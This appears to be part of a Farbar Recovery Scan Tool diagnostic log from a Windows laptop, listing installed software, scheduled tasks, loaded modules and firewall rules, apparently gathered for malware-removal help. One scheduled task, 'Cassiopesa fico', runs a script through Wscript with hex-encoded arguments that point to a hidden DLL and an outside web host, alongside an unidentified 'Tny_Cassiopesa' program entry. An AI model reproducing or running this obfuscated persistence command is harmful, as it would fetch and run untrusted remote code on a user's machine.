IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6482.0 - IDT)
Inst5675 (Version: 8.00.51 - Softex Inc.) Hidden
Inst5676 (Version: 8.00.51 - Softex Inc.) Hidden
Java 8 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218060F0}) (Version: 8.0.600.27 - Oracle Corporation)
Just Learn Morse Code (HKLM-x32\...\{CBE3B17D-C988-4AF7-B84E-BEFF6F60BCC9}) (Version: 1.0.0.0 - Sigurd Stenersen)
Mediatek Bluetooth stack (HKLM-x32\...\{B39E1237-AB91-4DAE-BB8A-F7EF19C7BA2A}) (Version: 11.0.751.0 - Mediatek)
Microsoft Office Home and Business 2013 - en-us (HKLM\...\HomeBusinessRetail - en-us) (Version: 15.0.4763.1003 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-3264377140-702172241-3405489607-1001\...\SkyDriveSetup.exe) (Version: 16.4.6013.0910 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106 (HKLM-x32\...\{6e8f74e0-43bd-4dce-8477-6ff6828acc07}) (Version: 11.0.51106.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106 (HKLM-x32\...\{8e70e4e1-06d7-470b-9f74-a51bef21088e}) (Version: 11.0.51106.1 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Norton Security Suite (HKLM-x32\...\N360) (Version: 22.5.4.24 - Symantec Corporation)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4763.1003 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4763.1003 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4763.1003 - Microsoft Corporation) Hidden
Pinger (HKLM-x32\...\Pinger 1.1.1.2) (Version: 1.1.1.2 - Pinger Inc.)
Pinger (x32 Version: 1.1.1.2 - Pinger Inc.) Hidden
PlayChess  (HKLM-x32\...\PlayChess) (Version:  - ChessBase GmbH)
QMemory Software Bundle (HKLM-x32\...\QMemory Software Bundle) (Version:  - QMemory)
QuickBooks (x32 Version: 24.0.4008.2403 - Intuit Inc.) Hidden
QuickBooks Premier: Contractor Edition 2014 (HKLM-x32\...\{4E935569-DDE7-49C9-955F-286BA104B2DB}) (Version: 24.0.4001.2403 - Intuit Inc.)
QuickBooks Runtime Redistributable (HKLM\...\{F2A4F809-2DE6-4D27-888B-4D2BB8DAF20E}) (Version: 1.00.0000 - Intuit Inc.)
Ralink RT3290 802.11bgn Wi-Fi Adapter (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 5.0.48.0 - Mediatek)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.30164 - Realtek Semiconductor Corp.)
Recovery Manager (x32 Version: 5.5.0.7001 - CyberLink Corp.) Hidden
Tny_Cassiopesa (HKLM-x32\...\Tny_Cassiopesa) (Version:  - Tny_Cassiopesa)
TurboTax 2013 (HKLM-x32\...\TurboTax 2013) (Version: 2013.0 - Intuit, Inc)
TurboTax 2014 (HKLM-x32\...\TurboTax 2014) (Version: 2014.0 - Intuit, Inc)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== Restore Points =========================
 
28-10-2015 02:15:02 Scheduled Checkpoint
31-10-2015 07:26:10 HPSF Applying updates
31-10-2015 07:27:55 HPSF Applying updates
08-11-2015 02:42:29 Scheduled Checkpoint
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 08:25 - 2013-08-22 08:25 - 00000824 ____A C:\windows\system32\Drivers\etc\hosts
 
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0A7B775E-BB5E-4F38-817A-E207AFCB51C7} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-23] (Google Inc.)
Task: {1FF741E0-6C4F-41FD-B1CD-1C0924B7353A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-08-27] (Hewlett-Packard Company)
Task: {246ABF62-3195-4ACB-B941-AA865F8667DC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-08-27] (Hewlett-Packard Company)
Task: {348FF3D6-4707-4C60-8DC1-EEF799EE0DC5} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton Security Suite\Upgrade.exe [2015-07-27] (Symantec Corporation)
Task: {4E57C7FB-E10B-4EC8-9AF0-BF784F603D57} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-10-07] (Microsoft Corporation)
Task: {53E6B106-6470-4247-AD73-F09FB940BD27} - System32\Tasks\GlaryInitialize 5 => C:\Program Files (x86)\Glary Utilities 5\Initialize.exe [2015-10-26] (Glarysoft Ltd)
Task: {5876DC5C-5456-434F-B836-9622C48A8784} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2015-10-20] (Hewlett-Packard)
Task: {67E8FFC7-94FF-44A7-810A-E1429B76962B} - System32\Tasks\CLMLSvc_P2G8 => c:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2013-08-05] (CyberLink)
Task: {7934409A-6FB2-48F7-8C66-20E12E705F6B} - System32\Tasks\Norton 360\Norton Error Analyzer => C:\Program Files (x86)\Norton 360\Engine\22.5.4.24\SymErr.exe [2015-09-08] (Symantec Corporation)
Task: {83D28D08-EBCF-4B26-8025-AC8CFD26813F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-23] (Google Inc.)
Task: {867D2054-0D0B-433B-9D15-6632AB4C0F12} - System32\Tasks\Cassiopesa fico => Wscript.exe "C:\ProgramData\{6EB9867A-3E3B-57FC-8FBD-277E5F3FF4F0}\2.0.1.9\cisa.txt" "433a2f50726f6772616d446174612f7b36454239383637412d334533422d353746432d384642442d3237374535463346463446307d2f322e302e312e392f6669636f2e646c6c" "687474703a2f2f73616f2e63737062696e742e636f6d2f" "--IsErIk" "//E:jscript"
Task: {8C3A5478-2BB9-46E9-87CB-F52729642F23} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\windows\system32\MRT.exe [2015-10-14] (Microsoft Corporation)
Task: {8CF5945A-FE13-4FB2-9CE7-02ABDAD76250} - System32\Tasks\GenericSettingsHandler\Windows-Credentials\RetrySyncTask_for_S-1-5-21-3264377140-702172241-3405489607-1001
Task: {930D76AE-FC60-453E-9CF4-5CE9D42F6588} - System32\Tasks\HPCeeScheduleForHolden => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2010-09-14] (Hewlett-Packard)
Task: {A03E0ACF-882E-48FD-8657-B1A1A9956960} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Tuneup => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-08-27] (Hewlett-Packard Company)
Task: {A433B6A5-FF28-404E-B954-F9BAE084C6C5} - System32\Tasks\CLVDLauncher => c:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe [2013-03-12] (CyberLink Corp.)
Task: {B9FB5FBE-BBDB-44C3-9EE1-36D0CBEF8FC6} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-10-07] (Microsoft Corporation)
Task: {D3E51F0B-AD82-4227-B70E-DD837FE3DD8D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2015-09-28] (Hewlett-Packard)
Task: {DD3E07B3-4E4B-40BB-9A2E-E9C372723E89} - System32\Tasks\GU5SkipUAC => C:\Program Files (x86)\Glary Utilities 5\Integrator.exe [2015-10-26] (Glarysoft Ltd)
Task: {E341A4DB-6C06-4D00-AE7F-8618397E8CC4} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton 360\Engine\22.5.4.24\WSCStub.exe [2015-09-23] (Symantec Corporation)
Task: {EDB5A814-DF9F-46F6-BB48-09326B1950DE} - System32\Tasks\Norton 360\Norton Error Processor => C:\Program Files (x86)\Norton 360\Engine\22.5.4.24\SymErr.exe [2015-09-08] (Symantec Corporation)
Task: {F65B92D0-3AB4-4EDD-B209-E2966A509CDD} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Tune-up Postponed => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2013-08-27] (Hewlett-Packard Company)
Task: {FAC15DD9-D896-4671-B499-84069C114B9C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2015-10-20] (Hewlett-Packard)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\HPCeeScheduleForHolden.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
 
==================== Loaded Modules (Whitelisted) ==============
 
2013-09-05 05:22 - 2013-09-05 05:22 - 00109568 _____ () C:\Program Files\Hewlett-Packard\SimplePass\cachesrvr.exe
2013-09-05 05:24 - 2013-09-05 05:24 - 00627200 _____ () C:\Program Files\Hewlett-Packard\SimplePass\cachedrv.dll
2013-09-05 05:24 - 2013-09-05 05:24 - 02540544 _____ () C:\Program Files\Hewlett-Packard\SimplePass\autheng.dll
2013-09-05 05:21 - 2013-09-05 05:21 - 00035328 _____ () C:\Program Files\Hewlett-Packard\SimplePass\ssplogon.dll
2013-09-05 05:21 - 2013-09-05 05:21 - 00055296 _____ () C:\Program Files\Hewlett-Packard\SimplePass\RandomPass.dll
2013-09-05 05:21 - 2013-09-05 05:21 - 00021504 _____ () C:\Program Files\Hewlett-Packard\SimplePass\cryptodll.dll
2013-09-05 05:36 - 2013-09-05 05:36 - 00306064 _____ () C:\Program Files\Hewlett-Packard\SimplePass\mstrpwd.dll
2013-09-05 05:36 - 2013-09-05 05:36 - 01298832 _____ () C:\Program Files\Hewlett-Packard\SimplePass\GraphicalPwd.dll
2014-10-24 06:14 - 2015-10-07 18:28 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2015-10-28 15:53 - 2015-09-01 11:04 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2013-09-05 05:31 - 2013-09-05 05:31 - 00064000 _____ () C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
2013-06-05 17:51 - 2013-06-05 17:51 - 00098304 _____ () c:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\BrandingNet4.dll
2015-10-18 01:05 - 2015-10-18 01:05 - 00028160 _____ () C:\Users\Holden\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\AC\Microsoft\CLR_v4.0\NativeImages\Microsoft.PerfTrack\3aa4cbea7adc836ff7968cf73ce11027\Microsoft.PerfTrack.ni.dll
2015-08-03 11:04 - 2015-08-03 11:04 - 00347136 _____ () C:\windows\assembly\NativeImages_v4.0.30319_64\Windows.Gloaae92e31#\1b6c35238563de0cb93d3ed0826a69a3\Windows.Globalization.ni.dll
2015-08-03 11:04 - 2015-08-03 11:04 - 00363520 _____ () C:\windows\assembly\NativeImages_v4.0.30319_64\Windows.Foundation\b3972424579e18e6699549ecb948c4ef\Windows.Foundation.ni.dll
2015-08-03 11:04 - 2015-08-03 11:04 - 00207872 _____ () C:\windows\assembly\NativeImages_v4.0.30319_64\Windows.System\5ab6059d1e922dc371685c5207f6f7a6\Windows.System.ni.dll
2015-08-03 11:04 - 2015-08-03 11:04 - 01278464 _____ () C:\windows\assembly\NativeImages_v4.0.30319_64\Windows.Storage\eea3e743a58cb4d556fe113d6336020b\Windows.Storage.ni.dll
2015-08-03 11:04 - 2015-08-03 11:04 - 01782272 _____ () C:\windows\assembly\NativeImages_v4.0.30319_64\Windows.App640a3541#\f1407bb1d381cf5dee299c4e5f0fdf9d\Windows.ApplicationModel.ni.dll
2015-07-14 01:31 - 2015-07-14 01:31 - 00551440 _____ () C:\Program Files\WindowsApps\Microsoft.BingWeather_3.0.4.337_x64__8wekyb3d8bbwe\SqliteWrapper.dll
2015-07-14 01:31 - 2015-07-14 01:31 - 00660920 _____ () C:\Program Files\WindowsApps\Microsoft.BingWeather_3.0.4.337_x64__8wekyb3d8bbwe\Sqlite3.dll
2015-08-03 11:04 - 2015-08-03 11:04 - 01459712 _____ () C:\windows\assembly\NativeImages_v4.0.30319_64\Windows.UI\5c9c0b89a558d0e589c254af6b1ca238\Windows.UI.ni.dll
2015-10-26 03:55 - 2015-10-26 03:55 - 02207232 _____ () C:\Users\Holden\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\AC\Microsoft\CLR_v4.0\NativeImages\Microsoft.B2e1870ee#\8c884c7e604ce7e64ee208c8e47b3d95\Microsoft.Bing.AppEx.Telemetry.ni.dll
2015-08-03 11:04 - 2015-08-03 11:04 - 01259520 _____ () C:\windows\assembly\NativeImages_v4.0.30319_64\Windows.Networking\84819467f44d3da49aa14236af8fcc9a\Windows.Networking.ni.dll
2015-08-06 03:41 - 2015-08-06 03:41 - 00632320 _____ () C:\windows\assembly\NativeImages_v4.0.30319_64\Windows.Security\2333488328d673bea8d60a9f2e84759c\Windows.Security.ni.dll
2015-10-18 01:05 - 2015-10-18 01:05 - 00117248 _____ () C:\Users\Holden\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\AC\Microsoft\CLR_v4.0\NativeImages\SqliteWrapper\696bd1d3763da57b5fd727587a8edb94\SqliteWrapper.ni.dll
2015-08-06 03:41 - 2015-08-06 03:41 - 01383936 _____ () C:\windows\assembly\NativeImages_v4.0.30319_64\Windows.Web\87bd4b0afae2a321640d4aba350d58a4\Windows.Web.ni.dll
2015-08-06 03:41 - 2015-08-06 03:41 - 00467456 _____ () C:\windows\assembly\NativeImages_v4.0.30319_64\Windows.Graphics\f4031c5dbdde97cb4a0c7572cc0d1f29\Windows.Graphics.ni.dll
2015-08-06 03:41 - 2015-08-06 03:41 - 02019840 _____ () C:\windows\assembly\NativeImages_v4.0.30319_64\Windows.Devices\271d406467b9db0758ea399495d00731\Windows.Devices.ni.dll
2015-08-06 03:41 - 2015-08-06 03:41 - 00521216 _____ () C:\windows\assembly\NativeImages_v4.0.30319_64\Windows.Data\e291aa8a59dc390d0cdf99d3c6d8b6e5\Windows.Data.ni.dll
2015-07-24 01:35 - 2015-07-24 01:35 - 00148480 _____ () C:\Program Files\WindowsApps\26720RandomSaladGamesLLC.GinRummyPro_2.0.1.15_neutral__kx24dqmazqk8j\GinRummy.exe
2014-06-05 11:17 - 2014-11-08 02:13 - 00083768 _____ () C:\Program Files (x86)\Common Files\Intuit\DataProtect\IBuEngHost.exe
2014-06-05 11:17 - 2014-11-08 02:13 - 00067896 _____ () C:\Program Files (x86)\Common Files\Intuit\DataProtect\IBuEng_x64Vista.dll
2015-07-02 20:38 - 2015-07-02 20:38 - 00183296 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\ErrorReporting.dll
2014-11-20 19:39 - 2014-11-20 19:39 - 00316576 _____ () C:\Program Files\Microsoft Office 15\root\office15\AppVIsvStream32.dll
2015-10-26 01:53 - 2015-10-26 01:53 - 00080160 _____ () C:\Program Files (x86)\Glary Utilities 5\zlib1.dll
2014-07-18 00:20 - 2013-08-05 02:49 - 00627672 _____ () c:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll
2013-08-05 17:48 - 2013-08-05 17:48 - 00016856 _____ () c:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll
2014-06-05 11:17 - 2014-11-08 02:13 - 00084280 _____ () C:\Program Files (x86)\Common Files\Intuit\DataProtect\IntuitDataProtect.XmlSerializers.dll
2015-10-28 15:52 - 2015-10-28 15:53 - 01033792 _____ () C:\Program Files\Microsoft Office 15\Root\Office15\ADDINS\UmOutlookAddin.dll
2015-10-31 04:34 - 2015-10-31 04:34 - 00831488 _____ () C:\Users\Holden\AppData\Local\Packages\26720RandomSaladGamesLLC.GinRummyPro_kx24dqmazqk8j\AC\Microsoft\CLR_v4.0_32\NativeImages\GinRummy\a1af3897e17a1198f6213332de77fae4\GinRummy.ni.exe
2015-08-05 01:48 - 2015-08-05 01:48 - 03530752 _____ () C:\windows\assembly\NativeImages_v4.0.30319_32\Windows.UI.Xaml\0b2afd93fc0545b7b94339e8a4a7af97\Windows.UI.Xaml.ni.dll
2015-08-05 01:48 - 2015-08-05 01:48 - 01131008 _____ () C:\windows\assembly\NativeImages_v4.0.30319_32\Windows.App640a3541#\72dff8d45b73e9b02b3838d29765607a\Windows.ApplicationModel.ni.dll
2015-10-31 04:34 - 2015-10-31 04:34 - 03002368 _____ () C:\Users\Holden\AppData\Local\Packages\26720RandomSaladGamesLLC.GinRummyPro_kx24dqmazqk8j\AC\Microsoft\CLR_v4.0_32\NativeImages\MonoGame.Framework\cf2f390790f1508109d9ef9cdd74d64b\MonoGame.Framework.ni.dll
2015-08-05 01:48 - 2015-08-05 01:48 - 00960000 _____ () C:\windows\assembly\NativeImages_v4.0.30319_32\Windows.UI\8ddd8ad15fe3fb05a871ef0115fb84e2\Windows.UI.ni.dll
2015-08-05 01:48 - 2015-08-05 01:48 - 00228864 _____ () C:\windows\assembly\NativeImages_v4.0.30319_32\Windows.Foundation\16c3eb7650767d95d002c998d0c73eb5\Windows.Foundation.ni.dll
2015-08-09 04:06 - 2015-08-09 04:06 - 00304128 _____ () C:\windows\assembly\NativeImages_v4.0.30319_32\Windows.Graphics\eff020aac8737300c74dee47a69c9bbf\Windows.Graphics.ni.dll
2015-08-05 01:48 - 2015-08-05 01:48 - 00808448 _____ () C:\windows\assembly\NativeImages_v4.0.30319_32\Windows.Storage\7abff64c7c1ea1fae5bd170c8238b73e\Windows.Storage.ni.dll
2015-08-09 04:06 - 2015-08-09 04:06 - 01282048 _____ () C:\windows\assembly\NativeImages_v4.0.30319_32\Windows.Devices\4764145200fcd33a90ced1505892fce6\Windows.Devices.ni.dll
2015-10-31 04:34 - 2015-10-31 04:34 - 00251392 _____ () C:\Users\Holden\AppData\Local\Packages\26720RandomSaladGamesLLC.GinRummyPro_kx24dqmazqk8j\AC\Microsoft\CLR_v4.0_32\NativeImages\WombatLib\28f354c8b19190101394ad723bab550e\WombatLib.ni.dll
2015-08-09 04:06 - 2015-08-09 04:06 - 00799232 _____ () C:\windows\assembly\NativeImages_v4.0.30319_32\Windows.Networking\86865ced79f3180ebdfa736d895e5edb\Windows.Networking.ni.dll
2015-08-09 04:06 - 2015-08-09 04:06 - 00337920 _____ () C:\windows\assembly\NativeImages_v4.0.30319_32\Windows.Data\98644a649e9bf9e880f2e97889501b07\Windows.Data.ni.dll
2015-08-09 04:06 - 2015-08-09 04:06 - 00402432 _____ () C:\windows\assembly\NativeImages_v4.0.30319_32\Windows.Security\ae4a1bf110c1a12f619514bde2b27939\Windows.Security.ni.dll
2015-08-05 01:48 - 2015-08-05 01:48 - 00133120 _____ () C:\windows\assembly\NativeImages_v4.0.30319_32\Windows.System\c639835fe3da556a2cbe2e03540996c0\Windows.System.ni.dll
2015-08-09 04:06 - 2015-08-09 04:06 - 00239616 _____ () C:\windows\assembly\NativeImages_v4.0.30319_32\Windows.Gloaae92e31#\94af4549db265c6f339c287c8675d234\Windows.Globalization.ni.dll
2015-10-22 15:01 - 2015-10-20 09:08 - 01532744 _____ () C:\Program Files (x86)\Google\Chrome\Application\46.0.2490.80\libglesv2.dll
2015-10-22 15:01 - 2015-10-20 09:08 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\46.0.2490.80\libegl.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-3264377140-702172241-3405489607-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Holden\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
HKLM\...\StartupApproved\StartupFolder: => "Intuit Data Protect.lnk"
HKLM\...\StartupApproved\StartupFolder: => "QuickBooks_Standard_21.lnk"
HKLM\...\StartupApproved\Run32: => "IJNetworkScanUtility"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{9C03A5FA-2186-4679-8204-5FE2D809674C}] => (Allow) C:\Program Files (x86)\HPConnectedMusic\HPConnectedMusic.exe
FirewallRules: [{19316862-26C2-4494-92EF-229606519609}] => (Allow) C:\Program Files (x86)\HPConnectedMusic\HPConnectedMusic.exe
FirewallRules: [{591F64C5-D5A6-4CD7-B214-7F8EA0386528}] => (Allow) %LocalAppData%\HPConnectedMusic\Application\HPConnectedMusic.exe
FirewallRules: [{2BFE9F9D-9E4B-4959-A49F-151CAA8D3E85}] => (Allow) %LocalAppData%\HPConnectedMusic\Application\HPConnectedMusic.exe
FirewallRules: [{12E625D4-615D-44AB-A676-3663D412F233}] => (Allow) %LocalAppData%\HPConnectedMusic\Application\spotify_helper.exe
FirewallRules: [{E3F10645-4EFA-4452-843F-F60C98FBADC6}] => (Allow) %LocalAppData%\HPConnectedMusic\Application\spotify_helper.exe
FirewallRules: [{54FB1226-DC00-4279-A0CF-FDE4F36EA4AB}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDirector10\PDR10.EXE
FirewallRules: [{6B78E44E-F809-43ED-8286-0BAFFBF8C9A3}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe
FirewallRules: [{FDD4E327-5330-4333-9EF0-0A1ED323D661}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMR\PowerDVD12DMREngine.exe
FirewallRules: [{4E04BE06-0BF0-452C-AFF8-65914CAFF958}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe
FirewallRules: [{27FD29D0-7E31-4774-9197-EEC92FB84BAF}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12Agent.exe
FirewallRules: [{B644B180-75CA-48F9-AA58-96B861EEEBCF}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe
FirewallRules: [{F9B4FCE4-055E-4D90-906B-C3A87CEAEF39}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe
FirewallRules: [{820A68E9-53D7-4022-8822-4EEC8CCF1D92}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{B6A15098-6BD6-4CE2-8571-57B65B2A2395}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{7D8004CD-C2D5-4BDC-8D47-00BB44055506}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{99E9B0DD-1A6C-4F96-A601-169CAB138144}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{0CEE5A1B-D022-403D-BE0C-4476BDEFA6F5}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{22804232-B81A-4BE5-82AC-F17EEE90FA4C}] => (Allow) LPort=2869
FirewallRules: [{9E28EA75-8C7C-406B-BC51-D2B4ACB56B68}] => (Allow) LPort=1900
FirewallRules: [{9E5DD4D6-0615-47B7-9FEC-2ADC37F4EEDB}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{5A8C2E8E-B70E-485D-A02A-BA8EAEF2AB8F}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{73B8BB8B-1DB0-4E8A-A9BA-76F7F5D24487}] => (Allow) C:\Users\Holden\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{68F4BEF2-84AE-45AB-AF8F-A9524D3054EF}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [TCP Query User{3B9FE188-5E76-45D0-BEBE-34D841B9A94B}C:\program files (x86)\logitech\desktop messenger\8876480\program\backweb-8876480.exe] => (Allow) C:\program files (x86)\logitech\desktop messenger\8876480\program\backweb-8876480.exe
FirewallRules: [UDP Query User{7E1BEA9D-EDA1-446A-A71F-E17E06BC8CC3}C:\program files (x86)\logitech\desktop messenger\8876480\program\backweb-8876480.exe] => (Allow) C:\program files (x86)\logitech\desktop messenger\8876480\program\backweb-8876480.exe
FirewallRules: [{3B280815-B667-4031-B721-D0FC958D60EC}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{A15B78BD-C4DF-4619-A5DF-9442560C744D}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
FirewallRules: [{79B31C89-8DC3-423D-870E-4C35C4145F97}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{040BC571-E6AF-436A-B48D-B9C5268A86E7}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{2A174AED-75D3-4F86-A29C-097424288556}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
